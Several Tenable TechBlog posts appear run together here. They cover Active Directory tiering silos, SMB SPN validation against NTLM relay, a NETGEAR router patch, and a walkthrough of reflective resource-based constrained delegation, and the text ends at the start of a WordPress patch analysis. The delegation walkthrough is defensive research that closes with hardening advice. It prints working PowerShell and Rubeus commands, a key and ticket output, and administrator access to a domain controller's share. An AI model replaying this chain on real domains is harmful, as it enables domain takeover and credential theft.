If you are building a Tier 0 silo, you need to add to it the following:

  • PAW (Privileged Access Workstations); they are administration workstations where domain administrators are authenticating to and from where they perform administration tasks.
  • Domain administrators; domain administrators should be restricted to interactively authenticate (think SSO) only to the computers members of the silo.
  • Domain controllers; domain administrators need to authenticate to domain controllers. By default, unconstrained delegation is configured for domain controllers (TRUSTED_FOR_DELEGATION) which means that administrators credentials are in memory.

Because users’ credentials are leaked on computers members of a silo, these computers are prime targets for attackers.

So finally, we can ask ourselves the following questions:

  • According to what we said, it seems that it is better to have the minimum number of machines in the silo. Where should I put a server like WSUS which belongs to the Tier 0 perimeter?
  • Is an administrator belonging to the silo still able to authenticate to a computer out of the silo in order to perform administration tasks?

How does it apply to a WSUS server and similar services?

A WSUS is a critical asset, it belongs to Tier 0. If a service like WSUS service has complex code which is prone to vulnerabilities and, moreover, if it is connected to the internet, the attack surface is increased. So is it wise to add such a server in a silo? Theoretically, the answer is no, as administrators credentials are in the server memory.

However, i can hear what you think;

  • What’s the point of having a WSUS out of the silo as, if it is compromised and dispatches a malicious update on Tier 0 computers, the whole Tier 0 is compromised.
  • How will an administrator authenticate to the WSUS if it is out of the silo?

For the first point, starting from the statement that a critical asset is more prone to a compromise, it should “theoretically” be out of the silo (this is counter-intuitive). It is even more true if compromising this asset does not allow to pivot as easily as an attacker can do by compromising a WSUS server (e.g. Exchange servers with split permissions model).

This situation can be resumed in the following schema:

We can see that theoretically there is no real need to have this WSUS server inside the T0 silo. If it is outside, the T0 administrator will still be able to authenticate thanks to a network authentication (logon type 3), e.g. using the Remote Desktop Protocol with Restricted Admin*, otherwise the authentication will fail.

(*) The Restricted Admin mode enforces a user to perform a Network Level Authentication (NLA) when connecting to the Remote Desktop Services.

See the following schema:

As any kind of interactive session is forbidden here, the T0 administrator remains protected.


This article was to lighten the fact that computers inside a silo are putting this silo at risk. They must be even more protected.

In our situation, the best architecture is to have an update server dedicated for each Tier. Each Tier should be isolated, a very fine-grained firewalling should be done. If you are putting out of the silo your WSUS server, RDP Restricted Admin should be configured to allow administrators to authenticate and NTLM should be deactivated for administrators in order to avoid bypassing authentication policies.

Thus, administrators should be members of the Protected Users group. Note that starting from Windows Server 2016, a user added to the silo has automatically NTLM disabled:

If only a Tier 0 silo is set (quite rare to see silos for Tier 1 and Tier 2), administration from an upper to a lower Tier should be done with caution as seen previously. To deny logon from a lower to an upper Tier, you can also use logon rights to explicitly deny accounts from a different perimeter.

Because more and more AD environments are Azure joined, Microsoft updated its model and provides the enterprise access model which aims at “superseding and replacing the legacy tier model that was focused on containing unauthorized escalation of privilege in an on-premises Windows Server Active Directory environment”.

Silo, or not silo, that is the question was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

SMB “Access is denied” Caused by Anti-NTLM Relay Protection


We investigated a situation where an SMB client could not connect to an SMB server. The SMB server returned an “Access Denied” during the NTLM authentication, even though the credentials were correct and there were no restrictions on both the server-side share and client-side (notably UNC Hardened Access). The only unusual thing is that the SMB server was accessed through a NAT mapping (DNAT to be precise): the client was connecting to an IP which was not the real server’s IP. This can happen in some VPN network setups. Also, we have seen this situation at some organizations (even without a VPN in the equation) where they request to connect to machines, such as domain controllers, through a unique Virtual IP (VIP) which allows load-balancing.

💡 As cybersecurity experts, this immediately made us think that this setup was in fact similar to an NTLM relay (aka SMB relay) attack, even though the intent was not malicious. And perhaps there could be a security hardening mechanism on the server side blocking this.

And indeed we were correct: the server had the “Microsoft network server: Server SPN target name validation level” policy (i.e. SmbServerNameHardeningLevel registry key) enabled which blocked this scenario. Here is the policy description from Microsoft:

This policy setting controls the level of validation that a server with shared folders or printers performs on the service principal name (SPN) that is provided by the client device when the client device establishes a session by using the Server Message Block (SMB) protocol. The level of validation can help prevent a class of attacks against SMB services (referred to as SMB relay attacks). This setting affects both SMB1 and SMB2.

➡️ This situation could also occur in your regular SMB environments, so follow along to see how to troubleshoot this, how it is configured, how it works and what we suggest to do in this case.


Here’s an example in this screenshot (sorry for the French UI machine on the right!):

The SMB client, on the left (IP, is trying to connect to the SMB server on the right (IP and FQDN dcfr.lab.lan), except it’s through the IP of a TCP relay (created with socat on Linux), at the bottom (IP which simulates the NAT situation seen initially in our investigation.

So, the SMB server sees an incoming authentication, where the SMB client has declared (in the “Target Name” attribute on the left) it is expecting to authenticate to the IP of the TCP relay (, which is different than the real server’s IP (

💥 Therefore, it detects the mismatch considered as an attack attempt, and denies the authentication right away, as we can see with the “Access is denied” error message and “STATUS_ACCESS_DENIED” in the SMB network capture.

With the same setup and server configuration, if the client connects directly to the server’s IP ( without the relay, all is matching and it works:

How to troubleshoot?

551 “SMB Session Authentication Failure” event

The first hint in identifying this issue is that it generates a 551 “SMB Session Authentication Failure” event in the SMBServer event log (as seen in the first screenshot above).

5168 “SPN check for SMB/SMB2 failed” event

There is also a 5168 Security event “SPN check for SMB/SMB2 failed”, where we clearly see the IP address that was sent (the SPN, in red) Vs. what was expected (the semicolon-separated list, in green), sorry again for the French UI:

Note that for the 5168 event to be generated, the “Audit File Share” audit policy must be enabled for Failure at least. You can check with:

auditpol.exe /get /SubCategory:"Detailed File Share"

We can also have the same 5168 event generated “because of NTLMv1 or LM protocols usage” since they don’t carry the required SPN attribute for the server to do its check.


✅ We can also check if the “Microsoft network server: Server SPN target name validation level” policy is enabled (for those following in French: “Serveur réseau Microsoft: niveau de validation du nom de la cible de serveur SPN”).

The corresponding registry key is SmbServerNameHardeningLevel found in “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters”

We can query it with:

reg query HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\ /v SmbServerNameHardeningLevel

Or using this dedicated PowerShell cmdlet:

Get-SmbServerConfiguration | fl *hard*

See below for the explanation of the possible values.

How to configure the policy?

⚙️ The “Microsoft network server: Server SPN target name validation level” policy has three possible values:

  • 0[default] = “Off”
    “The SPN is not required or validated by the SMB server from a SMB client.”
  • 1 = “Accept if provided by client”
    “The SMB server will accept and validate the SPN provided by the SMB client and allow a session to be established if it matches the SMB server’s list of SPN’s for itself. If the SPN does NOT match, the session request for that SMB client will be denied.”
  • 2 = “Required from client”
    “The SMB client MUST send a SPN name in session setup, and the SPN name provided MUST match the SMB server that is being requested to establish a connection. If no SPN is provided by the client, or the SPN provided does not match, the session is denied.”

In our testing, we observed access denied errors in such a relay/NAT situation, with either the values of 1 or 2, because the Windows SMB client knows to provide the expected SPN. However, setting the registry key to 0 disables the protection and indeed it made the connection possible even through the relay.

How does this protection work?

Protocol support

Perhaps you have noticed something strange: here we can see an “SPN” in the context of an NTLM authentication… Whereas usually SPN only appears within the context of Kerberos! 🤔

The NTLM specification, [MS-NLMP] clearly uses this term:

MsvAvTargetName: The SPN of the target server.

Also, as described in the 5168 event:

It often happens because of NTLMv1 or LM protocols usage from client side when “Microsoft Network Server: Server SPN target name validation level” group policy set to “Require from client” on server side. SPN only sent to server when NTLMv2 or Kerberos protocols are used, and after that SPN can be validated.

Indeed, NTLMv1 and LM protocols don’t have the required fields to carry the SPN expected and provided by the client.

Of course, this security mechanism works with Kerberos since service tickets embed an SPN.

Protection against NTLM relaying

📄 NTLM relay attacks, sometimes called SMB relay attacks, have been well-known for many years. I recommend these great articles if you want to learn more: and

During such an attack, the client authenticates to the attacker’s machine, which relays it to another machine (like in a Man-in-the-Middle attack), which is the attacker’s real target. But thanks to this additional SPN attribute, the client declares the server it’s expecting to authenticate to, which would be the attacker’s IP, and when the target server receives the relayed authentication it can detect that there’s a mismatch (the declared IP isn’t its own) and denies the authentication. Of course, it works with hostnames and FQDNs instead of IPs.

This protection is also explained in this section of the same article:

Offensive security perspective

An SMB client can be modified to send a correct target name, for example, using the impacket library as described in this article. But this doesn’t make this protection useless in the context of an NTLM relay attack, as the attacker cannot modify the SMB client used by the victim.

🔒 Moreover, this SPN attribute cannot be removed nor modified during an NTLM relay attack because it belongs to the attributes list (AV_PAIR), which is protected by the MIC as described in many articles, including this recent one from Synacktiv about the NTLM EPA protection.

What do we recommend?

🛡️ Of course, as cybersecurity experts, we do not recommend to remove this hardening feature that is usually enabled for good reason! Many cybersecurity agencies encourage evaluating this policy and enabling it where possible, as described in many security standards that Tenable products allow to audit.

As described previously, we could also create our own SMB client to send a crafted, but correct, SPN value, but obviously this solution is not possible in most cases…

  1. The easiest solution, when possible, is to connect to the server directly, using its real IP (i.e., without NAT).
  2. Otherwise, there is a registry key which allows for declaring of a list of alternative names and IPs allowed through this mechanism. It is the SrvAllowedServerNames key, which must be created in “HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” with type REG_MULTI_SZ. This is described in this Microsoft support article “Description of the update that implements Extended Protection for Authentication in the Server service” and in this answer on ServerFault.
    We confirm it works (with both values enabling the policy):

SMB “Access is denied” Caused by Anti-NTLM Relay Protection was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

NETGEAR Router Network Misconfiguration

5 December 2022 at 17:16

Last Minute Patch Thwarts Pwn2Own Entries

Entering Pwn2Own is a daunting endeavor. The targets selected are often popular, already picked over devices with their inclusion in the event only increasing the amount of security researcher eyes pouring over them. Not only that, but it’s not uncommon for vendors to release last minute patches for the included targets in an effort to thwart researcher findings. This year alone we see that both TP-Link and NETGEAR have released last minute updates to devices included in the event.

Last Minute TP-Link Patch

Unfortunately, we fell victim to this with regards to a planned submission for the NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400). The patch released by NETGEAR the day before the registration deadline dealt a deathblow to our exploit chain and unfortunately invalidated our submission. A few posts on Twitter and communications with other parties appear to indicate that other contestants were also affected by this last minute patch.

That said, since the patch is publicly available, let’s talk about what changed!

While we aren’t aware of everything patched or changed in this update, we do know which flaw prevented our full exploit chain from working properly. Basically, a network misconfiguration present in versions prior to V1.0.9.90 of the firmware inadvertently allowed unrestricted communication with any services listening via IPv6 on the WAN (internet facing) port of the device. For example, SSH and Telnet are operating on ports 22 and 23 respectively.

The SMD service hosting SSH and Telnet variants on IPv6

Prior to the patch, an attacker could interact with these services from the WAN port. After patching, however, we can see that the appropriate ip6tables rules have been applied to prevent access. Additionally, IPv6 now appears disabled by default on newly configured devices.

We’d also like to point out that — at the time of this writing — the device’s auto-update feature does not appear to recognize that updates are available beyond V1.0.6.74. Any consumers relying on the auto-update or “Check for Updates” mechanisms of these devices are likely to remain vulnerable to this issue and any other issues teased over the coming days of Pwn2Own Toronto 2022.

More details can be found on our security advisory page here. We’ll have more information regarding other discovered issues once the coordinated disclosure process for them has been concluded.

NETGEAR Router Network Misconfiguration was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

How to mimic Kerberos protocol transition using reflective RBCD

7 November 2022 at 16:59

As I am often looking for misconfigurations dealing with Kerberos delegation, I realize that I was missing an interesting element while playing with the Kerberos protocol extensions S4U2Self and S4U2Proxy. We know that a delegation is dangerous if an account allows delegating third-party user authentication to a privileged resource. In the case of constrained delegation, all it takes is to find a privileged account in one of the SPN (Service Principal Name) set in the msDS-AllowedToDelegateTo attribute of a compromised service account.

I asked myself whether it’s possible to exploit a case of constrained delegation without protocol transition since the S4U2Self does not provide valid “evidence” as we will see. Is there a way to mimic the protocol transition?

Even if i read quite a few articles dealing with Kerberos delegation, i realized that it was the crusade of Elad Shamir’s research Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory, and that the answer stands in what is called Reflective Resource-Based Constrained Delegation (Reflective RBCD).

While Reflective RBCD is not a new technique and as this technique does not command high visibility in Google searches, I thought it would be interesting to share with you my thoughts about mimicking protocol transition.

Kerberos Constrained Delegation

With the Kerberos constrained delegation, if a service account TestSvc has the attribute msDS-AllowedToDelegateTo set with an SPN targeting a service running under a privileged object — such as CIFS on a Domain Controller — TestSvc may impersonate an arbitrary user to authenticate to the service running in the security context of the privileged object — in this case, the DC — which is very dangerous.

Delegating to a domain controller

However, in order to exploit the Kerberos constrained delegation, the literature usually says that we also need the protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION set on TestSvc) to generate a forwardable service ticket for ourselves (S4U2Self) and to pass it to the S4U2Proxy, which requests another new service ticket to access our privileged object. Here, the protocol transition (S4U2Self) is required to impersonate an arbitrary user.

This makes us wonder if there’s a way to exploit the constrained delegation — assuming the service account is compromised — without protocol transition? More importantly, is there a way to impersonate any user without the protocol transition? And if not, why?

Environment setup

TestSvc is our compromised service account;

  • It is unprivileged, being only member of the Domain Users group
  • It has an SPN, required for delegating
  • It can also delegate to the domain controller DC01
PS J:\> New-ADUser -Name "TestSvc" -SamAccountName TestSvc -DisplayName "TestSvc" -Path "CN=Users,DC=alsid,DC=corp" -AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) -Enabled $True -PasswordNeverExpires $true -ChangePasswordAtLogon $false
PS J:\> Set-ADUser -Identity TestSvc -Replace @{"servicePrincipalName" = "MSSQLSvc/whatever.alsid.corp" }
PS J:\> Set-ADUser -Identity TestSvc -Add @{'msDS-AllowedToDelegateTo'=@('HOST/DC01.ALSID.CORP')}

Service Ticket as an evidence

Since the protocol transition uses S4U2Self to get a valid service ticket for ourselves and use it as “evidence” for S4U2Proxy, our first thought might be whether we can forge this ticket on our own. Since we compromised TestSvc, we know its secret, which leads us to think that it’s possible to forge this service ticket in theory.

And yet we fail to forge a ticket for an arbitrary user and pass it to S4U2Proxy.

The first step consists in forging the service ticket to use as evidence (040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 is the aes256 key of the TestSvc service account, MSSQLSvc/whatever.alsid.corp is the SPN requested, held by TestSvc itself):

.\Rubeus.exe silver /service:MSSQLSvc/whatever.alsid.corp /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /user:alsid.corp\Administrator /ldap /domain:alsid.corp /flags:forwardable /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/


[*] Action: Build TGS
[*] Building PAC
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'MSSQLSvc/whatever.alsid.corp'
[*] base64(ticket.kirbi):

Next, we use this evidence for the S4U2Proxy request:

.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /msdsspn:HOST/DC01.ALSID.CORP /altservice:CIFS /tgs:<previously_forged_b64_service_ticket>
[*] Action: S4U

[*] Loaded a TGS for ALSID.CORP\Administrator
[*] Impersonating user 'Administrator' to target SPN 'HOST/DC01.ALSID.CORP'
[*] Final ticket will be for the alternate service 'CIFS'
[*] Building S4U2proxy request for service: 'HOST/DC01.ALSID.CORP'
[*] Using domain controller: DC01.alsid.corp (
[*] Sending S4U2proxy request to domain controller


The S4U2Proxy rejected our forged service ticket with the error KRB_AP_ERR_MODIFIED due to a PAC (Privilege Attribute Certificate) validation issue, as seen below:

KRB_AP_ERR_MODIFIED error in Wireshark

By the way, if you’re looking for information on decrypting encrypted data stub in Kerberos exchanges, check out Decrypt Kerberos/NTLM “encrypted stub data” in Wireshark by Clément Notin [Tenable].

According to Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory:

The problem with silver tickets is that, when forged, they do not have a PAC with a valid KDC signature. If the target host is configured to validate KDC PAC Signature, the silver ticket will not work. There may also be other security solutions that can detect silver ticket usage.

In fact, before CVE-2020–17049 (Kerberos Bronze Bit Attack), an attacker who owned a service account, was able to forge the missing FORWARDABLE flag of a service ticket and passed it successfully to the S4U2Proxy protocol extension.

Also, according to CVE-2020–17049: Kerberos Bronze Bit Attack — Theory:

Later when the KDC receives the service ticket during the S4U2proxy exchange, the KDC can validate all three signatures to confirm that the PAC and the service ticket have not been modified. If the service ticket is modified (for example, if the forwardable bit has changed), the KDC will detect the change and reject the request with an error such as “KRB_AP_ERR_MODIFIED(Message stream modified).”

Note that, since KB4598347 (CVE-2020–17049), the KDC no longer checks the forwardable flag as we will see.

Reflective RBCD

If we control TestSvc, it means that we can set the RBCD (Resource-based Constrained Delegation) on this object since we have full control over it.

RBCD only needs the permission to write an attribute (msDS-AllowedToActOnBehalfOfOtherIdentity), instead of msDS-AllowedToDelegateTo (classical constrained delegation) which needs to be a domain administrator. More precisely, to set the msDS-AllowedToDelegateTo attribute, the SeEnableDelegationPrivilege privilege is required and is granted to the “Domain Local’’ group Administrators (see the security policies in the Default Domain Controllers Policy).

Note that the protocol transition — TRUSTED_TO_AUTH_FOR_DELEGATION UAC flag — also needs domain administrators privileges to be set.

Setting self RBCD:

PS J:\> whoami
PS J:\> Get-ADUser TestSvc -Properties msDS-AllowedToDelegateTo,servicePrincipalName,PrincipalsAllowedToDelegateToAccount,TrustedToAuthForDelegation

msDS-AllowedToDelegateTo : {HOST/DC01.ALSID.CORP}
servicePrincipalName : {MSSQLSvc/whatever.alsid.corp}
PrincipalsAllowedToDelegateToAccount : {}
TrustedToAuthForDelegation : False

PS J:\> Set-ADUser TestSvc -PrincipalsAllowedToDelegateToAccount TestSvc
PS J:\> Get-ADUser TestSvc -Properties PrincipalsAllowedToDelegateToAccount

PrincipalsAllowedToDelegateToAccount : {CN=TestSvc,CN=Users,DC=alsid,DC=corp}

Because without setting the protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION), the S4U2Self can’t provide successfully valid “evidence” (i.e. a service ticket) to the S4U2Proxy, the trick is to replace the S4U2Self — used for the protocol transition — with a reflective RBCD to execute an RBCD attack on ourselves.

But this time, as the Resource-based Constrained Delegation allows to perform a successful delegation (*), understanding allows an attacker to generate a valid service ticket impersonating an arbitrary user, we successfully reproduced somehow the protocol transition.

(*) The KDC only checks if the delegated user is OK to be delegated, meaning that it’s neither Protected Users nor flagged as sensitive, and set as trustee in the msds-AllowedToActOnBehalfOfOtherIdentity attribute.

Note: The msDS-AllowedToActOnBehalfOfOtherIdentity attribute used to configure RBCD is a security descriptor:

PS J:\> $account = Get-ADUser TestSvc -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
PS J:\> ConvertFrom-SddlString -Sddl $account."msDS-AllowedToActOnBehalfOfOtherIdentity".Sddl
Owner            : BUILTIN\Administrators
Group :
DiscretionaryAcl : {ALSID\TestSvc: AccessAllowed (ChangePermissions, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ExecuteKey, FullControl, GenericAll, GenericExecute, GenericRead, GenericWrite, ListDirectory, Modify, Read, ReadAndExecute, ReadAttributes, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, Write, WriteAttributes, WriteData, WriteExtendedAttributes, WriteKey)}
SystemAcl : {}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor

Finally, we have (S4U2Self + S4U2Proxy) + extra S4U2Proxy, where (S4U2Self + S4U2Proxy) is the reflective RBCD.

Mimicking Kerberos protocol transition

Here are the detailed steps:


The service ticket is for an arbitrary user and it is not forwardable. With regard to RBCD, this is not an issue because a forwarded ticket will be accepted by the S4U2Proxy. In fact nowadays this is not really accurate as, since KB4598347, the KDC no longer checks the forwardable flag to avoid blindly trusting the PAC in case of PAC forgery. Moreover, in the case of the Resource-Based Constrained Delegation, the KDC only checks if the delegated user is OK to be delegated (i.e. not Protected Users, not NOT_DELEGATED) and if the delegating resource (TestSvc) is set as a trustee in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

  • S4U2Proxy;

We get a forwardable service ticket for ourselves (see setting self RBCD above) to use as evidence for the next S4U2Proxy.

  • S4U2Proxy (again);

We just tricked our way into getting a valid evidence. Now we can request a service ticket this time for a service running under the privileged object set in msDS-AllowedToDelegateTo (classic constrained delegation).

In practice, we have:


Current LogonId is 0x1:0x7a919ebc

Cached Tickets: (1)

#0> Client: TestSvc @ ALSID.CORP
Server: krbtgt/ALSID.CORP @ ALSID.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/8/2022 11:54:43 (local)
End Time: 7/8/2022 21:54:43 (local)
Renew Time: 7/15/2022 11:54:43 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC01

J:\>dir \\DC01.ALSID.CORP\C$
Access is denied.

J:\>.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /domain:alsid.corp /msdsspn:MSSQLSvc/whatever.alsid.corp /impersonateuser:Administrator /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/


[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605
[*] Building AS-REQ (w/ preauth) for: 'alsid.corp\TestSvc'
[*] Using domain controller:
[+] TGT request successful!
[*] base64(ticket.kirbi):


[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: DC01.alsid.corp (
[*] Sending S4U2self request to
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):


[*] Impersonating user 'Administrator' to target SPN 'MSSQLSvc/whatever.alsid.corp'
[*] Building S4U2proxy request for service: 'MSSQLSvc/whatever.alsid.corp'
[*] Using domain controller: DC01.alsid.corp (
[*] Sending S4U2proxy request to domain controller
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'MSSQLSvc/whatever.alsid.corp':


First, we’ve done S4U2Self and S4U2Proxy. Now let’s ask for a service ticket for the domain controller. (Note: If you want to avoid a new AS-REQ request, you can pass the TestSvc TGT with the switch /ticket). The service ticket passed as argument (/tgs) is the result of the previous and final S4U2Proxy:

J:\>.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /msdsspn:HOST/DC01.ALSID.CORP /altservice:CIFS /ptt /nowrap /tgs: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

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/


[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605
[*] Building AS-REQ (w/ preauth) for: 'alsid.corp\TestSvc'
[*] Using domain controller:
[+] TGT request successful!
[*] base64(ticket.kirbi):


[*] Action: S4U

[*] Loaded a TGS for ALSID.CORP\Administrator
[*] Impersonating user 'Administrator' to target SPN 'HOST/DC01.ALSID.CORP'
[*] Final ticket will be for the alternate service 'CIFS'
[*] Building S4U2proxy request for service: 'HOST/DC01.ALSID.CORP'
[*] Using domain controller: DC01.alsid.corp (
[*] Sending S4U2proxy request to domain controller
[+] S4U2proxy success!
[*] Substituting alternative service name 'CIFS'
[*] base64(ticket.kirbi) for SPN 'CIFS/DC01.ALSID.CORP':

[+] Ticket successfully imported!

We can switch between services as long as they are running in the context of the same targeted service account. Here, we forged the service class CIFS. Now let’s try to access the share C$ of the DC:

Current LogonId is 0:0x868064
Cached Tickets: (1)
#0>     Client: Administrator @ ALSID.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 11/2/2022 17:44:09 (local)
End Time: 11/3/2022 3:44:09 (local)
Renew Time: 11/9/2022 17:44:09 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
J:\>dir \\DC01.ALSID.CORP\C$
Volume in drive \\DC01.ALSID.CORP\C$ has no label.
Volume Serial Number is 64CB-7382

Directory of \\DC01.ALSID.CORP\C$

02/07/2022 08:55 PM 620
02/07/2022 09:45 PM <DIR> extract
02/08/2022 02:35 PM 18,874,368 ntds.dit
09/15/2018 09:19 AM <DIR> PerfLogs
02/28/2022 09:41 PM <DIR> Program Files
10/08/2021 07:03 PM <DIR> Program Files (x86)
07/07/2022 05:40 PM <DIR> tmp
06/22/2022 05:02 PM <DIR> tools
06/16/2022 03:33 PM <DIR> Users
12/16/2021 03:28 PM 8,744 vssown.vbs
05/12/2022 06:29 PM <DIR> Windows
3 File(s) 18,883,732 bytes
8 Dir(s) 23,103,582,208 bytes free


The reflective RBCD is a good technique to mimic the protocol transition. We can conclude that any kind of delegation to a privileged object is very dangerous because it puts at risk your entire forest if an attacker compromises the underlying service account. These dangerous delegations must not be allowed.

All Service Principal Names (SPNs) referencing a privileged object — such as a domain controller — must be removed from the msDS-AllowedToDelegateTo attribute. You can do this in the “Delegation” tab of the Active Directory Users and Computers management console. This same precaution applies to privileged objects authorizing authentication delegation thanks to Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity).

How to mimic Kerberos protocol transition using reflective RBCD was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Wordpress 6.0.3 Patch Analysis

31 October 2022 at 11:12


WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

WordPress version 6.0.3 was released on 17 October 2022. As it is a security release, it contains only security patches for multiple vulnerabilities. Rémy Marot and I have analyzed some of these patches and this article focuses on three of these patches.

Stored XSS in WordPress Core via Comment Editing

